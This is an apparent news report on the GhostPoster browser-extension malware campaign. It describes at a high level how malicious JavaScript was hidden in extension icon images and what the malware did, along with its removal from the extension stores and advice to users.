A significant and long-running malware operation, dubbed 'GhostPoster,' has been exposed, revealing a sophisticated campaign that infected over 840,000 users across Google Chrome, Mozilla Firefox, and Microsoft Edge browsers. The campaign was initially identified by Koi Security researchers in December 2025, with a subsequent, more expansive report from browser security firm LayerX in January 2026. The GhostPoster malware distinguishes itself through its innovative use of steganography, embedding malicious JavaScript code directly within the seemingly harmless PNG image files used as extension icons. This technique allowed the malware to bypass traditional static analysis tools and remain undetected within official browser extension stores for an extended period, with some malicious extensions active since as early as 2020. Once installed, the malicious extensions, often masquerading as legitimate tools like VPNs, translation utilities, or ad blockers, would initiate a multi-stage infection process. The malware employs delayed execution, waiting between 48 hours and five days before communicating with its command-and-control servers and only fetching payloads intermittently (10% of the time) to further evade detection. Its capabilities include comprehensive monitoring of browsing activity, stripping critical browser security headers, hijacking affiliate marketing links for financial gain through ad and click fraud, injecting fraudulent iframes, and even programmatically solving CAPTCHA challenges to maintain operations. The researchers noted that the campaign spanned at least 17 extensions in its initial phase, affecting over 50,000 Firefox users, with later findings identifying additional extensions and a significantly larger user base. While Google has confirmed the removal of the identified extensions from the Chrome Web Store, and they are no longer available on Mozilla's and Microsoft's platforms, users who previously installed these malicious add-ons remain at risk and are advised to manually remove them. The persistent nature and advanced evasion tactics of GhostPoster highlight the evolving threats within browser extension ecosystems, making robust cybersecurity practices essential for all internet users.